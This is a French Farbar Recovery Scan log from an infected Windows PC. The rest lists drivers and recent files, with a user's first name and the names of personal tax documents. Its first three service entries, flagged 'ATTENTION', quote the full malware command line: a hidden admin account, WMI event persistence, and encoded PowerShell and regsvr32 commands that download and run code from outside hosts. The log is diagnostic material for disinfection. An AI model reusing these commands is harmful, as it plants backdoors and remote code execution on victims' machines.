S2 PBAD; cmd /c net1 user admin$ Zxcvbnm,.1234 /ad&net1 localgroup administrators admin$ /ad&net1 localgroup administradores admin$ /ad&wmic /NAMESPACE:"\root\subscription" PATH __EventFilter WHERE Name="fuckyoumm3" DELETE&wmic /NAMESPACE:"\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckyoumm4" DELETE&wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer WHERE Name="fuckyoumm4" DELETE&wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='fuckyoumm3'" DELETE&wmic /NAMESPACE:"\root\subscription" PATH __EventFilter CREATE Name="fuckyoumm3", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"&wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer CREATE Name="fuckyoumm4", CommandLineTemplate="cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host:8888/1.txt scrobj.dll®svr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll®svr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll"&wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="fuckyoumm3"", Consumer="CommandLineEventConsumer.Name="fuckyoumm4""&start regsvr32 /s /u /n /i:http://173.208.172.202:8888\s1.txt scrobj.dll [X] <==== ATTENTION
S2 ZuiC; cmd /c net1 user admin$ Zxcvbnm,.1234 /ad&net1 localgroup administrators admin$ /ad&net1 localgroup administradores admin$ /ad&wmic /NAMESPACE:"\root\subscription" PATH __EventFilter WHERE Name="fuckyoumm3" DELETE&wmic /NAMESPACE:"\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckyoumm4" DELETE&wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer WHERE Name="fuckyoumm4" DELETE&wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='fuckyoumm3'" DELETE&wmic /NAMESPACE:"\root\subscription" PATH __EventFilter CREATE Name="fuckyoumm3", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"&wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer CREATE Name="fuckyoumm4", CommandLineTemplate="cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host:8888/1.txt scrobj.dll®svr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll®svr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll"&wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="fuckyoumm3"", Consumer="CommandLineEventConsumer.Name="fuckyoumm4""&start regsvr32 /s /u /n /i:http://173.208.172.202:8888\s1.txt scrobj.dll [X] <==== ATTENTION
S2 ZWjH; cmd /c net1 user admin$ Zxcvbnm,.1234 /ad&net1 localgroup administrators admin$ /ad&net1 localgroup administradores admin$ /ad&wmic /NAMESPACE:"\root\subscription" PATH __EventFilter WHERE Name="fuckyoumm3" DELETE&wmic /NAMESPACE:"\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckyoumm4" DELETE&wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer WHERE Name="fuckyoumm4" DELETE&wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='fuckyoumm3'" DELETE&wmic /NAMESPACE:"\root\subscription" PATH __EventFilter CREATE Name="fuckyoumm3", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"&wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer CREATE Name="fuckyoumm4", CommandLineTemplate="cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host:8888/1.txt scrobj.dll®svr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll®svr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll"&wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="fuckyoumm3"", Consumer="CommandLineEventConsumer.Name="fuckyoumm4""&start regsvr32 /s /u /n /i:http://173.208.172.202:8888\s1.txt scrobj.dll [X] <==== ATTENTION
===================== Pilotes (Avec liste blanche) ======================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
R1 aswArPot; C:\Windows\System32\drivers\aswArPot.sys [167480 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
R1 aswbidsdriver; C:\Windows\System32\drivers\aswbidsdriverx.sys [188976 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
R0 aswbidsh; C:\Windows\System32\drivers\aswbidshx.sys [165384 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
R0 aswblog; C:\Windows\System32\drivers\aswblogx.sys [284256 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
R0 aswbuniv; C:\Windows\System32\drivers\aswbunivx.sys [57904 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
S3 aswHwid; C:\Windows\System32\drivers\aswHwid.sys [42736 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
R1 aswKbd; C:\Windows\System32\drivers\aswKbd.sys [40688 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
R2 aswMonFlt; C:\Windows\System32\drivers\aswMonFlt.sys [135200 2019-01-19] (AVAST Software s.r.o. -> AVAST Software)
R0 aswNdis; C:\Windows\System32\DRIVERS\aswNdis.sys [12112 2019-02-26] (ALWIL Software -> ALWIL Software)
R0 aswNdis2; C:\Windows\System32\drivers\aswNdis2.sys [332280 2019-02-26] (AVAST Software s.r.o. -> AVAST Software)
R1 AswRdr; C:\Windows\System32\drivers\aswRdr.sys [70640 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
R0 aswRvrt; C:\Windows\System32\drivers\aswRvrt.sys [72800 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
R1 aswSnx; C:\Windows\System32\drivers\aswSnx.sys [784560 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
R1 aswSP; C:\Windows\System32\drivers\aswSP.sys [398200 2019-04-29] (AVAST Software s.r.o. -> AVAST Software)
R3 aswStmXP; C:\Windows\System32\drivers\aswStmXP.sys [146584 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
R0 aswVmm; C:\Windows\System32\drivers\aswVmm.sys [310200 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
S3 atikmdag; C:\Windows\System32\DRIVERS\atikmdag.sys [3533824 2008-03-09] (Microsoft Windows Hardware Compatibility Publisher -> ATI Technologies Inc.)
R0 AtiPcie; C:\Windows\System32\DRIVERS\AtiPcie.sys [7680 2006-10-30] (Microsoft Windows Hardware Compatibility Publisher -> ATI Technologies Inc.)
S3 DrvAgent32; C:\Windows\system32\Drivers\DrvAgent32.sys [30504 2017-01-13] (eSupport.com, Inc -> Phoenix Technologies)
S4 iteatapi; C:\Windows\system32\drivers\iteatapi.sys [35944 2006-11-02] (Microsoft Windows -> Integrated Technology Express, Inc.)
S4 iteraid; C:\Windows\system32\drivers\iteraid.sys [35944 2006-11-02] (Microsoft Windows -> Integrated Technology Express, Inc.)
S3 LVUSBSta; C:\Windows\System32\drivers\lvusbsta.sys [22016 2005-01-31] (Microsoft Windows Hardware Compatibility Publisher -> Logitech Inc.)
R2 npf; C:\Windows\System32\drivers\npf.sys [35088 2011-02-11] (CACE Technologies, Inc. -> CACE Technologies, Inc.)
S4 ntrigdigi; C:\Windows\system32\drivers\ntrigdigi.sys [20608 2006-11-02] (Microsoft Windows -> N-trig Innovative Technologies)
S3 PID_0928; C:\Windows\System32\DRIVERS\LV561AV.SYS [211712 2005-01-31] (Microsoft Windows Hardware Compatibility Publisher -> Logitech Inc.)
S1 RapportAegle; C:\Program Files\Trusteer\Rapport\bin\RapportAegle.sys [296880 2018-03-11] (IBM -> IBM Corp.) [Fichier non signé]
S1 RapportCerberus_1908115; C:\ProgramData\Trusteer\Rapport\store\exts\RapportCerberus\baseline\RapportCerberus32_1908115.sys [1123304 2018-03-27] (IBM -> IBM Corp.) [Fichier non signé]
S1 RapportEI; C:\Program Files\Trusteer\Rapport\bin\RapportEI.sys [395624 2018-03-11] (IBM -> IBM Corp.) [Fichier non signé]
S3 RapportHades; C:\Windows\System32\Drivers\RapportHades.sys [200936 2018-03-11] (IBM -> IBM Corp.) [Fichier non signé]
S3 RapportIaso; c:\programdata\trusteer\rapport\store\exts\rapportms\baseline\rapportiaso.sys [299112 2018-03-27] (IBM -> IBM Corp.) [Fichier non signé]
S3 RapportKELL; C:\Windows\System32\Drivers\RapportKELL.sys [321256 2018-03-11] (IBM -> IBM Corp.) [Fichier non signé]
S3 RapportPG; C:\Program Files\Trusteer\Rapport\bin\RapportPG.sys [466728 2018-03-11] (IBM -> IBM Corp.) [Fichier non signé]
S3 SWDUMon; C:\Windows\System32\DRIVERS\SWDUMon.sys [22728 2019-05-17] (AVG Technologies CZ, s.r.o. -> SlimWare Utilities, Inc.)
S4 uliahci; C:\Windows\system32\drivers\uliahci.sys [238648 2008-01-21] (Microsoft Windows -> ULi Electronics Inc.)
S4 UlSata; C:\Windows\system32\drivers\ulsata.sys [98408 2006-11-02] (Microsoft Windows -> Promise Technology, Inc.)
S4 ulsata2; C:\Windows\system32\drivers\ulsata2.sys [115816 2008-01-21] (Microsoft Windows -> Promise Technology, Inc.)
R3 yukonwlh; C:\Windows\System32\DRIVERS\yk60x86.sys [298496 2007-12-28] (Microsoft Windows Hardware Compatibility Publisher -> Marvell)
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 MBAMSwissArmy; \??\C:\Windows\system32\drivers\MBAMSwissArmy.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
==================== NetSvcs (Avec liste blanche) ===================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
==================== Un mois (créés) ========
(Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.)
2019-05-17 15:29 - 2019-05-17 15:31 - 000040272 _____ C:\Users\françoise\Desktop\FRST.txt
2019-05-17 15:28 - 2019-05-17 15:29 - 000000000 ___DC C:\FRST
2019-05-17 15:26 - 2019-05-17 15:26 - 001793536 _____ (Farbar) C:\Users\françoise\Desktop\Non confirmé 306702.crdownload
2019-05-17 15:17 - 2019-05-17 15:28 - 001793536 _____ (Farbar) C:\Users\françoise\Desktop\FRST.exe
2019-05-17 15:07 - 2019-05-17 15:07 - 000069579 _____ C:\Users\françoise\Desktop\2019-05-17windows.pdf
2019-05-15 10:32 - 2019-05-15 10:32 - 000335224 _____ C:\Windows\system32\FNTCACHE.DAT
2019-05-15 09:03 - 2019-05-15 09:03 - 001852840 _____ (Orange) C:\Users\françoise\Documents\Orange-assistant-page-de-demarrage.exe
2019-05-13 07:45 - 2019-05-13 07:45 - 000000970 _____ C:\Users\Public\Desktop\Avast Cleanup Premium.lnk
2019-05-11 11:55 - 2019-05-11 11:55 - 000108649 _____ C:\Users\françoise\impot 2018 pour 2019.pdf
2019-05-11 11:23 - 2019-05-11 11:23 - 001852840 _____ (Orange) C:\Users\françoise\Orange-assistant-page-de-demarrage.exe
2019-05-11 09:59 - 2019-05-11 09:59 - 127391104 ____C (Microsoft Corporation) C:\Windows\system32\MRT-KB890830.exe
2019-05-06 08:48 - 2019-05-06 08:48 - 000049590 _____ C:\Users\françoise\Desktop\2019-05-06_084806 trojan.pdf
2019-05-05 09:55 - 2008-04-01 06:00 - 000055296 _____ (CANON INC.) C:\Users\françoise\cnmss Canon MP240 series Printer (Local).dll
2019-05-04 10:32 - 2019-05-04 10:32 - 000077121 _____ C:\Users\françoise\Desktop\facture_9046121647_2019-04-23.pdf
2019-05-04 06:47 - 2019-05-04 06:47 - 000000000 ____D C:\Users\françoise\AppData\Local\BitTorrentHelper
2019-05-02 14:21 - 2019-03-26 09:07 - 000013104 _____ C:\Users\françoise\Documents\ReleveMensuelJanvier2019.pdf
2019-05-02 14:02 - 2019-05-02 14:02 - 000000000 ____D C:\Users\françoise\AppData\Roaming\Lavasoft
2019-05-02 14:02 - 2019-05-02 14:02 - 000000000 ____D C:\Users\françoise\AppData\Local\Lavasoft
2019-05-02 14:00 - 2019-05-15 11:00 - 000000000 ____D C:\Users\françoise\AppData\Roaming\uTorrent
2019-05-02 05:36 - 2019-05-17 14:36 - 000000080 _____ C:\Windows\system32\s
2019-05-02 05:36 - 2019-05-17 14:36 - 000000078 _____ C:\Windows\system32\ps
2019-05-02 05:36 - 2019-05-17 14:36 - 000000076 _____ C:\Windows\system32\p
2019-04-30 07:49 - 2019-04-30 07:51 - 000000000 ____D C:\Users\françoise\AppData\Roaming\fr.orange.assistancelivebox
2019-04-30 07:49 - 2019-04-30 07:49 - 000001030 _____ C:\Users\françoise\Desktop\ma Livebox.lnk
2019-04-30 07:49 - 2019-04-30 07:49 - 000000000 ____D C:\Users\françoise\AppData\Roaming\Microsoft\Windows\Start Menu\Programmes\Programs\Orange
2019-04-30 07:49 - 2019-04-30 07:49 - 000000000 ____D C:\Program Files\Bonjour
2019-04-30 07:48 - 2019-04-30 07:48 - 000000000 ____D C:\Program Files\WinPcap
2019-04-29 14:29 - 2019-05-02 12:54 - 000000000 ____D C:\Program Files\eMule
2019-04-28 17:36 - 2019-04-28 17:36 - 000000940 _____ C:\Users\françoise\Desktop\Attestation-Fiscale-PCI-2018 - Raccourci.lnk
2019-04-28 17:31 - 2019-04-28 17:31 - 000090439 _____ C:\Users\françoise\Avis_de_taxes_foncières_2018.pdf
2019-04-28 17:29 - 2019-04-28 17:29 - 000045749 _____ C:\Users\françoise\Desktop\Avis_de_taxe_d'habitation-CAP_2018.pdf
2019-04-28 17:11 - 2019-04-28 17:11 - 000122725 _____ C:\Users\françoise\Desktop\Réédition déclaration fiscale.pdf
2019-04-28 17:11 - 2019-04-28 17:11 - 000012768 _____ C:\Users\françoise\Desktop\Attestation-Fiscale-PCI-2018.pdf
==================== Un mois (modifiés) ========
(Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.)
2019-05-17 15:04 - 2006-11-02 14:47 - 000003216 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2019-05-17 15:04 - 2006-11-02 14:47 - 000003216 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2019-05-17 14:45 - 2006-11-02 13:18 - 000000000 ____D C:\Windows\inf
2019-05-17 14:43 - 2018-08-16 06:34 - 000000466 _____ C:\Windows\Tasks\Avast Driver Updater Startup.job
2019-05-17 14:43 - 2013-10-12 15:14 - 000000000 _____ C:\Windows\system32\LogConfigTemp.xml
2019-05-17 14:42 - 2006-11-02 13:18 - 000000000 ____D C:\Windows\system
2019-05-17 14:42 - 2006-11-02 13:18 - 000000000 ____D C:\Windows\IME
2019-05-17 14:41 - 2018-08-16 06:34 - 000022728 _____ (SlimWare Utilities, Inc.) C:\Windows\system32\Drivers\SWDUMon.sys
2019-05-17 14:37 - 2019-04-16 07:44 - 000023552 _____ (Microsoft Corporation) C:\Windows\system\downs.exe
2019-05-17 14:37 - 2019-04-16 07:44 - 000000084 _____ C:\Program Files\Common Files\xpdown.dat
2019-05-17 14:36 - 2006-11-02 15:01 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2019-05-17 10:47 - 2006-11-02 15:01 - 000032578 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2019-05-17 09:59 - 2014-03-03 14:36 - 000000000 ____D C:\Users\françoise\AppData\Local\CrashDumps
2019-05-17 09:57 - 2016-11-17 16:19 - 000000000 ____D C:\Users\françoise\AppData\LocalLow\Mozilla
2019-05-16 07:04 - 2016-06-23 17:03 - 000000000 ____D C:\Users\françoise\AppData\Local\AVAST Software
2019-05-15 07:26 - 2013-11-27 06:24 - 000842296 _____ (Adobe) C:\Windows\system32\FlashPlayerApp.exe
2019-05-15 07:26 - 2013-11-27 06:24 - 000175160 _____ (Adobe) C:\Windows\system32\FlashPlayerCPLApp.cpl
2019-05-15 07:26 - 2008-12-16 05:33 - 000000000 ____D C:\Windows\system32\Macromed
2019-05-13 08:06 - 2018-02-19 04:40 - 000000000 ____D C:\Users\françoise\Desktop\Anciennes données de Firefox
2019-05-13 08:06 - 2016-12-18 08:17 - 000000000 ____D C:\Users\françoise\AppData\Local\Microsoft Help
2019-05-13 08:06 - 2013-10-25 19:22 - 000000000 ____D C:\Users\françoise\AppData\Roaming\Skype
2019-05-13 08:06 - 2008-12-16 13:14 - 000000000 ____D C:\Windows\Panther
2019-05-13 07:47 - 2013-10-18 12:04 - 000000000 ____D C:\Users\françoise\AppData\Roaming\AVAST Software
2019-05-13 07:45 - 2019-02-26 18:04 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVAST Software
2019-05-13 07:44 - 2013-10-12 17:12 - 000000000 ____D C:\Program Files\AVAST Software
2019-05-13 07:44 - 2013-10-12 17:11 - 000000000 ____D C:\ProgramData\AVAST Software
2019-05-11 11:55 - 2013-10-12 13:18 - 000000000 ____D C:\Users\françoise
2019-05-11 10:05 - 2006-11-02 12:24 - 128044056 ____C (Microsoft Corporation) C:\Windows\system32\mrt.exe
2019-04-30 07:49 - 2014-01-04 15:40 - 000000000 ____D C:\ProgramData\Orange
2019-04-30 07:49 - 2014-01-04 15:40 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Orange
2019-04-30 07:48 - 2014-01-04 15:38 - 000000000 ____D C:\Program Files\Orange
2019-04-30 07:23 - 2008-01-21 10:41 - 001592042 _____ C:\Windows\system32\PerfStringBackup.INI
2019-04-30 07:23 - 2008-01-21 10:40 - 000722222 _____ C:\Windows\system32\perfh00C.dat
2019-04-30 07:23 - 2008-01-21 10:40 - 000146056 _____ C:\Windows\system32\perfc00C.dat
2019-04-30 07:18 - 2015-08-08 08:54 - 000000000 ____D C:\Windows\Minidump
2019-04-29 14:00 - 2013-10-12 17:14 - 000398200 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSP.sys
2019-04-28 17:16 - 2016-12-16 11:13 - 000000000 ____D C:\ProgramData\CanonIJPLM
==================== Fichiers à la racine de certains dossiers =======
2017-01-05 07:03 - 2017-01-05 07:03 - 001110564 _____ (Igor Pavlov) C:\Users\françoise\7z1604.exe
2016-12-17 19:47 - 2016-12-17 19:52 - 132368998 _____ () C:\Users\françoise\Apache_OpenOffice_4.1.3_Win_x86_install_fr.exe
2019-05-05 09:55 - 2008-04-01 06:00 - 000055296 _____ (CANON INC.) C:\Users\françoise\cnmss Canon MP240 series Printer (Local).dll
2019-02-04 12:39 - 2007-04-02 06:00 - 000055296 _____ (CANON INC.) C:\Users\françoise\cnmss Canon MP470 series Printer (Local).dll
2019-05-11 11:23 - 2019-05-11 11:23 - 001852840 _____ (Orange) C:\Users\françoise\Orange-assistant-page-de-demarrage.exe
2017-05-03 10:00 - 2017-05-03 10:00 - 002764800 _____ () C:\Users\françoise\ZHPCleaner.exe
2016-06-21 04:43 - 2016-07-22 19:54 - 002230272 _____ () C:\Users\françoise\ZHPDiag3.exe
2018-10-23 16:10 - 2018-10-23 16:10 - 007649280 _____ () C:\Program Files\GUT255C.tmp
2018-10-23 16:03 - 2018-10-23 16:03 - 007649280 _____ () C:\Program Files\GUTB931.tmp
2018-10-23 16:03 - 2018-10-23 16:03 - 007649280 _____ () C:\Program Files\GUTF103.tmp
2019-04-16 07:44 - 2019-05-17 14:37 - 000000084 _____ () C:\Program Files\Common Files\xpdown.dat
2014-03-15 04:09 - 2014-11-03 14:34 - 000000481 _____ () C:\Users\françoise\AppData\Roaming\mainhst.zgh
2013-10-12 17:28 - 2015-03-31 08:23 - 000026340 _____ () C:\Users\françoise\AppData\Roaming\UserTile.png
2014-09-25 18:59 - 2018-01-17 07:40 - 000000698 _____ () C:\Users\françoise\AppData\Roaming\wklnhst.dat
2013-11-12 12:46 - 2018-01-11 10:05 - 000008808 _____ () C:\Users\françoise\AppData\Local\d3d9caps.dat
2015-02-18 05:20 - 2015-02-18 05:20 - 000001974 _____ () C:\Users\françoise\AppData\Local\ZHPFixReport.txt
==================== SigCheck ===============================
(Il n'y a pas de correction automatique pour les fichiers qui ne satisfont pas à la vérification.)
LastRegBack: 2019-05-17 14:47
==================== Fin de FRST.txt ============================